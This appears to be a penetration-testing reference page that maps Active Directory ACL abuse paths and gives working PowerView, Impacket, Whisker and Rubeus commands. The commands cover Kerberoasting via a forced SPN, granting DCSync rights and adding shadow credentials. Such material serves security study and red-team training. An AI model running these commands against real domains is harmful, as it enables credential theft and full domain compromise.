ACL Abuse Paths
Active Directory ACL attack vectors
ACL AbuseTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[BloodHound ACL Analysis] --> B{Permission Type}
B --> C[GenericAll]
B --> D[GenericWrite]
B --> E[WriteDacl]
B --> F[ForceChangePassword]
C --> G[Full Control - Reset Pass]
C --> H[Add to Group]
C --> I[Set SPN - Kerberoast]
D --> I
D --> J[Shadow Credentials]
E --> K[Grant DCSync Rights]
F --> L[Direct Password Reset]
G --> M[Take Over Account]
H --> M
I --> M
J --> M
K --> N[Domain Compromise]
L --> M
M --> N
Related Modules
Quick Reference
BloodHound ACL Edges
- GenericAll: Full control
- GenericWrite: Modify attributes
- WriteOwner: Change owner
- WriteDacl: Modify permissions
- ForceChangePassword: Reset password
Abuse GenericAll on User
# Set SPN for Kerberoasting
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/YOURPC'} # Abuse GenericAll to set SPN
GetUserSPNs.py domain/attacker -dc-ip DC # Kerberoast the modified accountAbuse WriteDacl
# Grant yourself DCSync rights Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity attacker -Rights DCSync # Abuse WriteDacl to grant DCSync
Shadow Credentials
Whisker.exe add /target:victim # Add shadow credential Rubeus.exe asktgt /user:victim /certificate:cert.pfx /password:pass # Auth with shadow cert